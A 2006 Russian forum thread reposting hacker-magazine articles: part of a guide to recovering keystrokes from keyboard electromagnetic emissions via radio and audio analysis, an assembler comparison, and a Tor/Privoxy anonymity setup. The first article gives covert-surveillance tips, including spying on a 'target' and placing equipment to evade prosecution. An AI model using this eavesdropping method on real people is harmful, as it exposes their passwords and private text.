Записав свое сообщение, внимательно посмотри на графическое изображение звуковой волны. На ней есть области относительного спокойствия - в эти промежутки времени ни одна из клавиш клавиатуры не была нажата. Есть же области, которые состоят из сплошных "всплесков". На слух они воспринимаются как щелчки. Это промежутки времени, когда какая-либо клавиша была нажата. В это время электрическая цепь была замкнута, и электромагнитные помехи исправно генерировались с определенной частотой. Выдели небольшой кусок диаграммы, содержащий клавиатурные помехи, и отмасштабируй его до таких размеров, чтобы четко прослеживался каждый нюанс, каждое отдельное колебание звуковой волны (в моем случае масштаб был равен 700%). В "NeroWaveEditor" -e масштабирование производится кручением колесика мыши (масштабирование - очень полезный инструмент, с его помощью ты всегда отличишь обычные помехи от нужных нам фрагментов, содержащих ценную информацию). Теперь обрати внимание на то, что звуковая волна имеет некоторые фрагменты (я бы назвал их ключами), которые повторяются постоянно, причем с определенной периодичностью (см. скриншоты). Эти повторяющиеся фрагменты придают нашей, казалось бы, случайной звуковой волне, характер периодической функции. Я насчитал по 2 фрагмента-ключа для каждой клавиши. Самое интересное заключается в том, что для каждой кнопки клавиатуры существуют свои фрагменты-ключи. "Но ведь мы можем узнать такие последовательности только для своей клавиатуры!" - в негодовании воскликнешь ты. Не беда! При наличии достаточно большого количества записанных "клавиатурных помех" можно провести частотный анализ (о нем можно прочесть в любой книжке по криптографии). Он основан на том факте, что каждая буква алфавита, равно как и знак препинания, встречается в тексте с определенной вероятностью, например, в русском языке буква "о" встречается гораздо чаще буквы "щ". Для проведения частотного анализа нужно будет составить массив, содержащий все виды помех. Далее нужно написать программу - анализатор звукового файла, сравнивающую содержащиеся в нем помехи с помехами из массива. Программа должна записать условные имена в файл (например, "pomexa1, pomexa5,…"). Этот файл и будет материалом для частотного анализа.

Обрати внимание на мой скриншот, который рассматривает волновую структуру для буквы "a", и сравни его с соответствующей структурой для буквы "h". Букву "a" можно сразу же визуально отличить от других по характерному w-образному фрагменту-всплеску. Действуя таким образом, ты вскоре научишься безошибочно определять, какой символ скрывается за данной последовательностью всплесков.

Антишум

Здесь будут приведены краткие рекомендации для тех экспериментаторов, которые не желают оказаться глухими еще в юности smile.gif. Уверяю читателей, что все предустановки фильтров, встроенные даже в самые известные аудиоредакторы (типа Noice Reduction), не помогут нам отсеять помехи и оставить нужный сигнал. Он просто-напросто удаляется при фильтрации вместе с "мусором", потому что анализаторы фильтров воспринимают нужные нам сигналы-всплески как "щелчки", то есть как дефекты аудиозаписи. Чтобы составить правильный фильтр, придется поработать головой. Путем долгого анализа я выяснил, что на звуковых частотах выше 3700 Гц содержится в основном один только свистящий шум. Выяснить это мне помог пункт меню NeroWaveEditor-а "Enhancement->Filter Toolbox" (я выделил звуковой фрагмент, содержащий полезный сигнал, заюзал вышеупомянутый инструмент и, установив флажок "Band Pass Filter", выбрал следующие параметры: "lower"=3700 Hz, "upper"=22050 Hz. Полезный сигнал почти перестал слышаться, следовательно, вся звуковая информация, лежащая от значения "lower" до "upper" - мусор, а остальное - полезный сигнал). Итак, выделяй всю запись и применяй вышеуказанный фильтр с параметрами "lower"=0 и "upper"=3700. При выполнении этой операции, конечно, теряется некоторая часть информации из области верхних частот. Есть возможность избежать таких потерь, настроив эквалайзер ("Tools->Equalizer"), но на это понадобится чуть больше времени. Экспериментируй с фильтрами - и ты добьешься нужного результата.

Причины использовать этот метод

Преимущество метода заключается прежде всего в его относительной несложности и доступности любому желающему. Для мобильного перехвата, то есть слежения за какой-либо интересующей тебя целью на чужой территории, может использоваться ноутбук с небольшим "довеском" - внешним радиоприемником. Для того чтобы обеспечить хороший результат, последний лучше заэкранировать или отнести его подальше от ноутбука, иначе ты можешь принять излучение от своего ноута за сигналы от клавиатуры-цели. Другое, более безопасное решение - запись радиосигнала нужной частоты на диктофон и последующее его изъятие.

Иные встречавшиеся мне методы изъятия ценной информации из электромагнитных помех, генерируемых клавиатурой, требуют, как минимум, анализатора спектра, осциллографа, частотомера, мультиметра и тому подобных приборов, что вряд ли подойдет даже для очень состоятельного гражданина. Плюс ко всему, пошарив в интернете, ты всегда легко найдешь схемы радиопередатчиков, которые, если ты умеешь пользоваться паяльником, помогут тебе в дистанционной передаче данных, что сделает твою жизнь намного безопаснее и почти гарантированно избавит тебя от тюремной похлебки. В этом случае для обеспечения своей безопасности необходимо установить мощную антенну и расположить приемник сигнала как можно дальше. Советую заглянуть на сайт www.radist.izmuroma.ru.

Еще один, довольно неплохой и, на мой взгляд, более удобный способ сканирования (хотя бы в силу возможностей тонкой настройки и большей дальнобойности) - применение коротковолновых трансиверов. Увы, но они стоят сравнительно дорого (простенькие образцы - от 200-300 долларов). Но если ты - заинтересованный человек, то трансивер для тебя окажется настоящим кладом. С его помощью можно не только перехватывать ЭМ-излучения, но и слушать секретные передачи - "морзянку", и делать множество иных полезных и интересных вещей. Но это уже совсем другая история. Интересный факт: белорусский радиотелефон "Алтай" (не знаю, выпускается ли он сейчас), являясь, по сути, простым трансивером, обладает неплохими возможностями для радиоперехвата.

Внимание! Если ты собираешься перехватывать информацию тем методом, что описан в данной статье, в больших объемах, тебе просто необходима хорошая звуковая карта, уровень собственных шумов которой незначителен. Иначе головной боли от переутомления не избежать. Поэтому обязательно проверь, подойдет ли твоя звуковая карта для подобной деятельности в "промышленных" масштабах, с помощью утилиты RightMark Audio Analyzer (http://audio.rightmark.org/rus).

И напоследок...

Если ты выполняешь на своем компьютере важную работу, требующую секретности, или обслуживаешь какой-либо сервер, тебе просто необходимо иметь надежные средства для защиты от утечки информации через электромагнитное излучение. А средства эти весьма разнообразны: фильтрация, заземление приборов, экранирование, электромагнитное зашумление и так далее. Эти средства будут оправданы, ведь существуют способы снятия сигнала даже с монитора компьютера-жертвы, то есть возможность получения достоверной картины работы пользователя за компьютером. Лучший способ узнать все о грозящей опасности - это понять принцип реализации атаки и опробовать ее на практике. Удачи!

Ван Эйк и его прибор

В 1985 году группа шведских ученых во главе с Вильямом Ван Эйком представила на суд общественности статью, в которой были изложены основные принципы перехвата информационного потока, передающегося с электромагнитным излучением, его декодирование и приведение в вид, понятный пользователю (эта идея была выдвинута ученым Доном Бриттоном в 1979 году, но тогда никто не обратил на нее внимания). Идея Ван Эйка заключалась в дополнении обычного телевизора таким образом, чтобы он выдавал изображение, с которого ведется перехват. Прибор искусственно создавал синхронизирующий сигнал при помощи двух осцилляторов (для вертикальной и горизонтальной синхронизации). Радиус его действия - около 1 километра (при условии использования специальной антенны для лучшей фокусировки). Самое интересное заключается в том, что этот прибор мог собрать любой радиолюбитель средней квалификации. Сумма, которую было необходимо потратить на закупку деталей, тоже являлась чисто символической - около $15.

CD/DVD

На нашем диске ты найдешь программу "RightMark Audio Analyzer", упоминавшуюся в статье

WARNING

Вся информация, содержащаяся в статье, - только для ознакомительных целей. За незаконное применение данного материала ответственность несешь только ты.

Облегчение поиска нужных фрагментов-ключей

Если ты затрудняешься с поиском нужных фрагментов или даже не можешь отделить шум от полезного сигнала, попробуй увеличить уровень звука на 4-6 дБ (в "NeroWaveEditor" -e выбери "Volume->Volume сhange").




Автор: Metallica Nov 30 2006, 13:21

Битва трансляторовASM-трансляторы: что такое хорошо и что такое плохо

Проблема выбора «единственного правильного» ассемблерного транслятора мучает не только начинающих, но и профессиональных программистов. У каждого продукта есть своя когорта поклонников, и спор о преимуществах/недостатках рискует превратиться в священные войны с выносом тел погибших. На форумах такие дискуссии лучше не разводить и вещать в одностороннем порядке, как я, собственно, и поступил, сравнив MASM, TASM, FASM, NASM, YASM и некоторые другие ассемблеры по всему спектру критериев, значимость которых каждый должен оценивать сам.

Основополагающие критерии

Существует ряд критериев, существенных для всех категорий программистов. Начнем с генерации отладочной информации, без которой отладка программы сложнее, чем «hello, word», превращается в настоящую пытку. Но если формат отладочной информации — это задний двор транслятора, то формат выходных файлов — это его лицо. Непосвященные только пожмут плечами. Какой там формат? Обыкновенный obj, из которого с помощью линкера можно изготовить все, что угодно: от exe до dll. На самом деле, «обыкновенных» объектных файлов в природе не бывает. Есть omf (в редакциях от Microsoft и IBM), coff, elf, aout и куча разной экзотики в стиле as86, rdf, ieee и т.д. Также заслуживает внимания возможность «сквозной» генерации двоичных файлов, не требующая помощи со стороны линкера. А некоторые ассемблеры (например, FASM) даже позволяют «вручную» генерировать исполняемые файлы и динамические библиотеки различных форматов, полностью контролируя процесс их создания и заполняя ключевые поля по своему усмотрению. Впрочем, программы, целиком написанные на ассемблере, — это либо вирусы, либо демки, либо учебные, либо обычный садомазохизм. На ассемблере чаще пишутся лишь системно-зависимые компоненты или модули, критичные к быстродействию, которые затем линкуются к основному проекту, и если ассемблер генерирует только omf, а компилятор — coff, то возникает проблема сборки «разнокалиберных» форматов воедино. Мне известен только один линкер, умеющий это делать, — ulink от Юрия Харона, он же обеспечивают нехилые возможности по сборке файлов «вручную», так что выбор конкретного ассемблерного транслятора целиком лежит на совести (и компетенции) программиста. Но все-таки лучше, чтобы и ассемблер, и компилятор генерировали одинаковые форматы объектных файлов.

Другой немаловажный критерий — количество поддерживаемых процессорных архитектур, которых в линейке x86 набралось уже больше десятка. Кстати, ни один из трансляторов не поддерживает набор команд x86-процессоров в полном объеме. Например, на MASM'е невозможно написать jmp 0007h:00000000h, и поэтому приходится прибегать к различным ухищрениям: либо реализовать команду через DB, что очень неудобно, либо заталкивать в стек сегмент/смещение, а потом делать retf, но это длинно, и к тому же воздействует на стек, которого у нас может и не быть.

MASM

Продукт жизнедеятельности ранней компании Microsoft, которой тот был нужен для создания MS-DOS, а позднее и для Windows 9x/NT. После выхода версии 6.13 продукт на некоторое время тормознул в развитии, но потом здравый смысл взял верх, и последняя версия (на момент написания этих строк — 6.13.8204) поддерживает уникод, все SSE/SSEII/SEEIII-расширения, объявляемые двумя директивами .686/.XMM, а также архитектуру AMD x86-64. Платформа Intel IA64 не поддерживается, но Microsoft поставляет Intel-ассемблер IAS.EXE.

Аббревиатура MASM расшифровывается отнюдь не как Microsoft Assembler, а как Macro Assembler, то есть Ассемблер с поддержкой макросов, покрывающих своими возможностями широкий круг задач: повторение однотипных операций с параметризацией (шаблоны), циклические макросы, условное ассемблирование и т.д., по сравнению с которым препроцессор языка Си выглядит жалкой подделкой. Имеется даже зачаточная поддержка основных парадигм ООП, впрочем, так и не получившая большого распространения, поскольку ассемблер и ООП концептуально несовместимы. Многие пишут даже без макросов на чистом ассемблере, считая свой путь идеологически наиболее правильным. Но о вкусах не спорят.

Сначала MASM распространялся в виде самостоятельного (и притом весьма дорогостоящего) пакета, но позже он был включен в состав DDK, которое вплоть до Windows 2000 DDK раздавалось бесплатно, а сейчас доступно только подписчикам MSDN. Впрочем, вполне полноценное DDK (с ассемблером) для Windows Server 2003 входит в Kernel-Mode Driver Framework, а сам транслятор MASM'а еще и в Visual Studio Express, которая бесплатна. Стив Хатчессон собрал последние версии транслятора MASM'а, линкер от Microsoft, включаемые файлы, библиотеки, обширную документацию, статьи разных авторов, посвященные ассемблерам, и даже простенькую IDE в один дистрибутив, известный как «пакет Хатча» (Hutch), бесплатно раздаваемый всем желающим на вполне лицензионной основе. Так что это не хак, а вполне удобный комплект инструментов для программирования под Windows на ассемблере.

MASM'у посвящено множество книг, что упрощает процесс обучения, а в сети можно найти кучу исходных текстов ассемблерных программ и библиотек, освобождающих программиста от необходимости изобретать велосипед. Также MASM является выходным языком для многих дизассемблеров (Sourcer, IDA Pro). Все это делает MASM транслятором номером один в программировании под Wintel.

Поддерживаются два выходных формата: 16/32 Microsoft OMF и (16)/32/64 COFF, что позволяет транслировать 16/32-разрядные программы под MS-DOS, работающие в реальном и защищенном режиме, 16-разрядные приложения и драйвера для Windows 3.x, 32-разряные приложения и драйвера для Windows 9x/NT, а также 64-разрядные приложения и драйвера для Windows NT 64-bit Edition. Для создания бинарных файлов потребуется линкер, который умеет это делать (например, ulink от Юрия Харона). Кстати говоря, последние версии штатного Microsoft Linker'а, входящее в SDK и DDK, утратили способность собирать 16-разрядные файлы под MS-DOS/Windows 3.x, поэтому приходится возвращаться к старой версии, которая лежит в папке NTDDK\win_me\bin16.

MASM генерирует отладочную информацию в формате CodeView, которую Microsoft Linker может преобразовывать в PDB-формат, хоть и не документированный, но поддерживаемый библиотекой dbghelp.dll, позволяющей сторонним разработчикам «переваривать» отладочную информацию, поэтому файлы, оттранслированные MASM'ом, можно отлаживать в Soft-Ice, дизассемблировать в IDA Pro и прочих продуктах подобного типа.

Главный недостаток MASM'а — его жуткая «багистность». Стоит только открыть Knowledge Base, посмотреть на список официально подтвержденных багов и… ужаснуться! Как только после этого на MASM'е вообще можно программировать?! Особенно много ошибок встречается в штатной библиотеке. Вот только несколько примеров: dwtoa и atodw_ex не понимают знака и по скорости очень тормозят, хотя в документации написано: «A high speed ascii decimal string to DWORD conversion for applications that require high speed streaming of conversion data»; ucFind не находит в строке подстроку, если длина подстроки равна одному символу; функции BMHBinsearch и SBMBinSearch реализованы с ошибками; некоторые функции обрушивают программу (если передать ustr2dw строку длиннее пяти байт — программа падает).

Другой минус — отсутствие поддержки некоторых инструкций и режимов адресации процессора, например, невозможно сделать jmp far seg:offset, а попытка создания смешанного 16/32-разрядного кода — это настоящий кошмар, который приходится разгребать руками и всячески извращаться, преодолевая сопротивление «менталитета» транслятора.

Наконец, MASM – типичный коммерческий продукт с закрытыми исходными текстами, судьба которых покрыта мраком. Microsoft интенсивно продвигает высокоуровневое программирование, отказываясь от ассемблера везде, где это только возможно, поэтому не исключено, что через несколько лет MASM прекратит свое существование...

Тем не менее, несмотря на все эти недостатки, MASM остается самым популярным профессиональным транслятором ассемблера при программировании под Windows NT, хотя разработчикам приходится плеваться и материться, но реальных альтернатив ему нет.

TASM

Самый популярный транслятор ассемблера времен MS-DOS, созданный фирмой Borland, полностью совместимый с MASM'ом, вплоть до версий 6.x, и поддерживающий свой собственный режим IDEAL с большим количеством улучшений и расширений.

Удобство программирования, скромные системные требования и высокая скорость трансляции обеспечивали TASM'у лидерство на протяжении всего существования MS-DOS (буква «T» означает Turbo). Но с появлением Windows популярность TASM'а стала таять буквально на глазах. Не сумев или не захотев добиться совместимости с заголовочными файлами и библиотеками, входящими в комплект SDK/DDK, фирма Borland решила поставлять свой собственный порт, причем далеко не идеальный. К тому же штатный линкер tlink/tlink32 не поддерживает возможности создания драйверов, а формат выходных файлов (Microsoft OMF, IBM OMF, Phar Lap) не поддерживается линкером от Microsoft. В довершении ко всему формат отладочной информации не совместим с CodeView и реально поддерживается только TurboDebugger'ом и soft-ice
И хотя эти проблемы в принципе разрешимы, возможность низкоуровневого ассемблерного программирования (без включаемых файлов и макросов) осталась там же, где и была. Несовместимость форматов компенсируется наличием конверторов, но преимущества режима IDEAL над стандартным синтаксисом MASM'а день ото дня казались все менее и менее значительными, ряды поклонников редели, и в конце концов проект загнулся. Последней версией транслятора стал TASM 5.0, поддерживающий команды вплоть до 80486 процессора. Отдельно был выпущен патч, обновляющий TASM до версии 5.3 и поднимающий его вплоть до Pentium MMX, однако команды Pentium II такие, например, как SYSENTER до сих не работают. Поддержка уникода тоже отсутствует.

В настоящее время Borland прекратила распространение своего ассемблера, и достать его можно только в магазинах, торгующих старыми CD-ROM, или у какого-нибудь коллекционера. Пацан по кличке !tE выпустил пакет TASM 5+, включающий в себя транслятор, линкер, библиотекарь, какое-то подобие документации, несколько заголовочных файлов под Windows и пару демонстрационных примеров. Когда будешь искать это добро, не перепутай его с TASM32 фирмы Squak Valley Software — это совершенно независимый кроссассемблер, ориентированный на процессоры 6502,6800/6801/68HC11, 6805, TMS32010, TMS320C25, TMS7000, 8048, 8051,8080/8085, Z80, 8096/80C196KC.

Короче, TASM — это труп. Причем вполне конкретный. Но для разработки прикладных приложений под Windows 16/32 и MS-DOS он все-таки подходит, особенно, если есть опыт работы с ним и некоторые собственные наработки (библиотеки, макросы), с которыми жалко расставаться, а конвертировать под MASM – весьма проблематично. Возможно, тебе понравится бесплатный Lazy Assembler (автор — Половников Степан), совместимый с режимом IDEAL TASM и поддерживающий команды из наборов MMX, SSE, SSEII, SSEIII, 3DNow!Pro.

FASM

Писать о культовых проектах, не затронув чувства верующих и сохранив при этом здоровую долю скептицизма и объективизма не так-то просто, особенно если ты сам являешься апологетом веры. FASM (расшифровывается как Flat Assembler – Ассемблер плоского режима) — это крайне необычный транслятор с экзотичными возможностями, которых все мы давно (и безуспешно!) ждали от крупных производителей, но те были слишком далеки от практического программирования и пытались сформировать новые потребности (например, путем введения поддержки ООП) вместо того, чтобы удовлетворять те, что есть.

Так продолжалось до тех пор, пока Томаш Гриштар (Tomasz Grysztar) — аспирант Ягеллонского университета в Кракове — не задумал написать свою собственную ось, названную Титаном и представляющую некоторое подобие DOS-системы для защищенного режима. Перебрав несколько ассемблерных трансляторов, но так и не обнаружив среди них подходящего, Томаш пошел на довольно амбициозный шаг, решив разработать необходимый инструментарий самостоятельно. Это произошло в 1999-03-23, 14:24:33 (дата создания первого файла), и уже к началу мая 1999 года появилась версия, способная транслировать сама себя (FASM написан на FASM'е). Операционная система в результате одной случайной катастрофы пала смертью храбрых, а вот исходные тексты FASM'а остались, и с тех пор он продолжает активно развиваться.

Что же такое FASM? Это ассемблер с предельно упрощенным синтаксисом (никаких offset'ов и прочих захламляющих листинг директив), полной поддержкой всех роцессорных команд (в том числе и jmp 0007:00000000), качественным кодогенератором, мощным макропроцессором и гибкой системой управления форматов выходных файлов.

FASM распространяется в исходных текстах на бесплатной основе, и к настоящему моменту перенесен на MS-DOS, Windows 9x/NT, LINUX, BSD, поддерживает уникод и все x86 процессоры вплоть до Pentium-4 с наборами мультимедийных инструкций MMX, SSE, SSEII, SSEIII, AMD 3DNow!, а также платформу AMD x86-64, позволяя генерировать не только Microsoft coff, но и готовые bin-, mz-, pe- и elf-файлы. То есть FASM позволяет обходиться без линкера, но при этом раскладку секций в PE-файле и таблицу импорта приходится создавать «вручную» с помощью специальных директив ассемблера. Но на практике все же удобнее сгенерировать coff и скомпоновать его с модулями, написанными на языках высокого уровня.

Макроязык FASM'а настолько мощный, что позволяет писать программы на себе самом без единой ассемблерной строки, например:

file 'interp.asm'

repeat $

load A byte from %-1

if A>='a' & A<='z'

A = A-'a'+'A'

end if

store byte A at %-1

end repeat

И пускай кто-то ворчит, ну вот, мол, еще одна попытка опустить ассемблер до уровня Бейсика. Ничего подобного! Макросы – вещь добровольная. Хочешь — пользуйся, не хочешь — не надо.

Все это были достоинства. Теперь поговорим о недостатках. Ни на что не похожий синтаксис FASM'а напрягает даже матерых программистов, заставляя их вгрызаться в плохо структурированную документацию и небольшое количество демонстрационных примеров, поставляемых вместе с транслятором. На это требуется время, которое в конечном счете ничем не компенсируется, поскольку круг задач, на которых FASM реально рвет MASM, крайне мал. Категорическая несовместимость с MASM'ом чрезвычайно затрудняет разработку Windows-драйверов (в большинстве своем создаваемых на основе примеров из DDK). Прикладным задачам, в свою очередь, требуется SDK и желательно первой свежести, да и программы, целиком написанные на ассемблере, — это совсем не то, чего требует бизнес-машина. «Математические» задачи, перемножающие матрицы, вычисляющие координаты пересечения кривых в N-мерном пространстве или трансформирующие графику — легко пишутся на FASM'е, поскольку не привязаны к конкретной операционной системе. Никаких API-функций они не вызывают и, вообще, не лезут туда, где можно обойтись Си/Си++.

Если бы FASM поддерживал генерацию отладочной информации, то его (с некоторой натяжкой) еще было бы можно рассматривать как серьезный инструмент, а так он остается игрушкой, пригодной для мелких задач типа «hello, world», вирусов, демок и прочих произведений хакерского творчества.

Наконец, ни у кого нет гарантий, что создатель FASM'а не утратит к нему интереса, а ведь без поддержки новых процессорных инструкций всякий транслятор обречен на медленное, но неизбежное вымирание. Открытость исходных текстов тут не поможет, ведь помимо них нужна еще и команда. Дожны быть «носители знания», способные удержать детали проекта у себя в голове, а тот факт, что FASM написан на себе самом, увы, читаемости листингам отнюдь не добавляет.

NASM

Транслятор NASM (расшифровывается как Netwide Assembler – расширенный ассемблер) возник тогда, когда не было ни одного хорошего свободного ассемблера под x86. FASM'а тогда еще не существовало. MASM/TASM стоили денег и работали только под MS-DOS/Windows. Единственный более-менее работающий транслятор под UNIX – GAS (GNU Assembler) — завязан на компилятор GCC и имеет такой ужасный синтаксис, что писать на нем могут только мазохисты. Остальные ассемблеры (типа A86, AS86) не позволяют писать 16/32-разрядный код или раздаются практически без документации.

Кончилось это дело тем, что группа программистов во главе с Петром Анвином (Peter Anvin) решила разработать собственный ассемблер. MASM-подобный синтаксис, мощная макросистема (впрочем, несовместимая с MASM'ом), поддержка всей линейки x86 процессоров, вплоть до IA64 в x86-режиме, богатство выходных файлов (bin, aout, aoutb, coff, elf, as86, obj, win32, rdf, ieee), генерация отладочной информации в форматах Borland, STABS и DWARF2 вкупе с портами под MS-DOS, Windows, Linux и BSD обеспечили NASM'у неслабую популярность, но без ярко выраженного фанатизма, характерного для FASM'а. Количество ошибок в трансляторе довольно много, причем, в отличие от работающих продуктов (MASM/TASM), при «хитрых ошибках» NASM не падает, а генерирует ошибочный (по структуре) объектный файл. Плюс, конечно же, как это принято в Open Source-community, полное игнорирование баг-репортов, «неудобных» для авторов (разработчики даже утверждают, что ошибок в их трансляторе вообще нет, в смысле им не известен ни один). Тем не менее, в последней версии NASM'а, в зависимости от значения ключа -On, код может сгенерироваться в 2-х или более экземплярах или может пропасть весь экспорт (pubdef'ы).

К минусам NASM'а можно отнести и отсутствие поддержки уникода, платформы AMD x86-64, формата отладочной информации CodeView и некоторые странности синтаксиса. В частности, команда «mov eax, 1» не оптимизируется, и транслятор умышленно оставляет место для 32-разрядного операнда. Если же мы хотим получить «короткий» вариант, то размер операнда необходимо специфицировать явно: «mov eax, byte 1», что очень сильно напрягает, или использовать опцию «-On» для автоматической оптимизации.

Также необходимо принудительно указывать длину переходов short или near, иначе очень легко нарваться на ругательство «short jump out of range». Впрочем существует возможность настроить транслятор на генерацию near-переходов по умолчанию.

Гораздо хуже, что NASM не помнит типы объявляемых переменных и не имеет нормальной поддержки структур.

Из мелких недочетов можно назвать невозможность автоматической генерации короткого варианта инструкции «push imm8» и отсутствие контроля над соответствием транслируемых инструкций типу указанного процессора (команда «cpuid» под «.486» ассемблируется вполне нормально, а ведь не должна).

Непосредственная трансляция примеров из SDK/DDK под NASM'ом невозможна, так что разрабатывать на нем драйвера под Windows может только очень крутой поклонник или извращенец. NASM — один из лучших ассемблеров под Liux/BSD, а вот под Windows его позиции уже не так сильны (в основном из-за неполной совместимости с MASM'ом).

YASM

Когда развитие NASM'а приостановилось, его исходные тексты легли в основу нового транслятора — YASM, что в зависимости от настроения может расшифровываться и как Yes, it's an assembler, и как Your favorite assembler, и как Yet another assembler, и даже как Why an assembler (последнее – шутка).

Вот основные отличительные черты YASM'а от его предшественника: поддержка платформы AMD x86-64, оптимизированный парсер, переваривающий синтаксис как NASM, так и GAS, более полная поддержка COFF (DJGPP) и Win32 obj выходных файлов, генерация отладочной информации в формате CodeView, интернационализация (выполненная через GNU-библиотеку gettext) и прочие мелкие улучшения, которых вполне достаточно, чтобы потеснить NASM в мире UNIX-подобных систем, где GAS-синтаксис по-прежнему играет ведущую роль.

Под Windows же YASM не имеет никаких ощутимых преимуществ перед MASM'ом, за исключением того, что поддерживает возможность генерации двоичных файлов, особенно удобных для создания shell-кода, но бесполезных для разработчика драйверов.




Автор: Metallica Nov 30 2006, 13:51

Сетевой камуфляжНестандартные методы сохранения анонимности

Наученные горьким опытом, все хакеры сейчас используют VPN. Не сервис, а настоящая находка: и трафик непрерывно шифрует, и анонимность гарантирует. По крайней мере, по словам тех, кто этот сервис предоставляет. На практике все может оказаться иначе: вдруг, откуда не возьмись, на сервере появятся внушительного размера логи, а потом и вовсе выяснится, что сервис контролируется компетентными органами. И рад бы я, если все это было плодом моего больного воображения. Так ведь нет — реальный пример из жизни! После таких инцидентов начинаешь задумываться об альтернативе этому самому VPN-сервису.

Приватный симбиоз

Когда речь заходит об альтернативе VPN, то первое, что приходит на ум — это, пожалуй, SSH-туннелирование. Прием очень хорош, прост в эксплуатации, но требует некоторых усилий и минимальных вложений. На страницах «Хакера» мы многократно рассказывали о его реализации, поэтому повторяться не будем. А коснемся сегодня двух совершенно других подходов, совершенно не похожих на то, что мы использовали ранее.

Первый из них основывается на использовании сразу двух утилит: Tor и Privoxy. Первую мы будем использовать в качестве средства для шифрования трафика и сохранения анонимности, а вторую — как мощный инструмент для фильтрации данных, передаваемых по HTTP(S)-протоколу, который будет скрупулезно удалять всю компрометирующую информацию, передаваемую твоими клиентскими приложениями.

Сказать, что Tor — это необычное приложение, значит, ничего не сказать. Поверь, это настоящий уникум.

Принцип обеспечения анонимности строится на базе распределенной системы серверов, так называемых нод, между которыми в зашифрованном виде передаются данные. Для соединения обычно используется три сервера, которые образуют временную цепочку. Каждый сервер выбирается случайным образом, при этом он знает только то, от какого звена получил данные и кому они предназначаются. Даже в случае перехвата данных на одном из серверов отследить полный маршрут пакетов (в том числе и их отправителя) не представляется возможным. Но это еще не все. Перед отправлением пакет последовательно шифруется тремя ключами: сначала для третьей ноды, потом для второй и, в конце концов, для первой. Когда первая нода получает пакет, она расшифровывает «верхний» слой шифра и узнает, куда отправить пакет дальше. Второй и третий сервер поступают аналогичным образом.

Как только цепочка выбрана, можно начинать передавать данные. Чтобы система не шла в ущерб скорости, одна цепочка используется в течение 10 минут, и только после этого периода происходит перестроение. Теперь о том, что через этот туннель можно запустить. Tor работает только с TCP-потоками и может быть использован любым приложением, работающим через SOCKS. На случай, когда в программе нельзя явно указать прокси, пригодятся соксофикаторы, такие как SocksCap (www.socks.permeo.com), FreeCap (www.freecap.ru) или Permeo Premium Agent (www.permeo.com/products/premium_agent.html), работающий на уровне драйвера.

Столь хитроумный способ передачи данных придумали программисты по федеральному заказу военно-морских сил США. Долгое время система была закрыта для свободного использования и предназначалась для ограниченного числа правительственных организаций и служб. Но теперь прелестями Tor’а можешь воспользоваться и ты — не упускай такую возможность.

Теперь что касается Privoxy. По сути, это обыкновенный HTTP-прокси, но с офигенными функциями фильтрования трафика, используемыми для обеспечения анонимности пользователя, динамического изменения содержания веб-страниц, управления cookies, ограничения доступа к некоторым сайтам и удаления рекламы, баннеров, всплывающих окон и spyware. Любые действия по фильтрации могут быть четко запрограммированы с помощью внутренней системы правил. Для нас самое важно то, что Privoxy анализирует HTTP-заголовки и подменяет их в случае необходимости согласно заданному набору рулесов для предотвращения передачи в заголовках какой-либо компрометирующей информации. В том числе «снимка» сессии пользователя, по которой впоследствии его можно будет идентифицировать среди множества других клиентов.

Надеваем камуфляж

Раньше, когда Tor только появился, приходилось долго и нудно ковыряться с текстовыми конфигами Privoxy и Tor. Сейчас все значительно проще: на официальном сайте Tor (http://tor.eff.org/index.html.ru) доступен готовый пакет, состоящий из непосредственно самого Tor, Privoxy, а также Vidalia, графической оболочки для управления системой. Во время установки трогать вообще ничего нельзя: все заинсталлится и без твоей помощи. После завершения процесса не спеши искать ярлычок Tor’а и запускать его. Поскольку мы установили GUI-оболочку для управления программой, то стартовать нужно именно ее. В трее появится зеленая перечеркнутая луковица. Это значит, что сервис отключен. Щелкни правой кнопкой мыши по ее изображению и в меню выбери Start. После этого программа полезет в инет (о чем, вероятно, завопит файрвол), чтобы обновить список нодов. По сути, уже сейчас можно работать — Tor по умолчанию работает как TCP-прокси на 9050 порту. То есть можно прописать его в браузере и проверять его боеспособность, но спешить не стоит.

Если программа не поддерживает протокол socks4a, и в качестве прокси-сервера указан непосредственно свой Tor-клиент (по умолчанию IP 127.0.0.1 и порт 9050), то она попытается самостоятельно определить IP-адрес запрашиваемого сервера. Скорее всего, для этого она отправит запрос на DNS-сервер твоего настоящего интернет-провайдера. А это мало того, что спалит тебя провайдеру, так еще и выдаст удаленному серверу используемый тобою DNS (который наверняка находится в подсети провайдера). Проверить возможность такого исхода несложно, если зайти через прокси на сайт www.dnsstuff.com/tools/aboutyou.ch и увидеть адрес своего DNS-сервера. Но не зря же мы ставили Privoxy — именно она поможет избежать подобного исхода. Тем более что чудопрокси изначально настроена на работу в связке с Tor’ом, поэтому разбираться с ее хитроумными правилами и конфигурацией тебе не придется. Достаточно запустить ее.

После этого на 8118 порту приютится прокси, которая будет резать все то, что может тебя выдать, и далее перенаправлять Tor’у. Для большего удобства рекомендую установить к Firefox’у плагин — TorButton (www.freehaven.net/~squires/torbutton/). Теперь включать и выключать работу Tor’а ты сможешь одной кнопкой мыши. Существует даже специальный набор TorPark (http://freehaven.net/~arrakis/torpark.html), состоящий из Firefox’а и Tor’а, который можно запустись с флешки. Проверить работоспособность системы несложно: достаточно зайти на сервис www.ip2location.com и посмотреть, какую информацию выдаст сайт о твоем месторасположении. Поверь мне: своего настоящего IP-адреса и название родного провайдера ты там не увидишь, а также и упоминания о прокси, поскольку в заголовках соединения отсутствуют все указывающие на это переменные окружения:

HTTP_FORWARDED: (none)

HTTP_X_FORWARDED_FOR: (none)

Программа Vidalia предоставляет несколько других интересных фишек системы. С помощью Bandwidth Graph ты можешь отслеживать сетевую активность системы. Окошко Message Log содержит информацию о деятельности Tor’а и возникающих ошибках. Хит сезона — пункт View Network, в котором отображается информация о нодах системы, а также на карте графически отображается передвижение твоих пакетов. У Tor’а есть совсем немного настроек, но все их ты сможешь задать через панель Configure. Здесь же, кстати, можно подключить русский язык к Vidalia, предварительно закачав его файл локализации (http://trac.vidalia-project.net/browser/trunk/src/lang/vidalia_ru.ts).

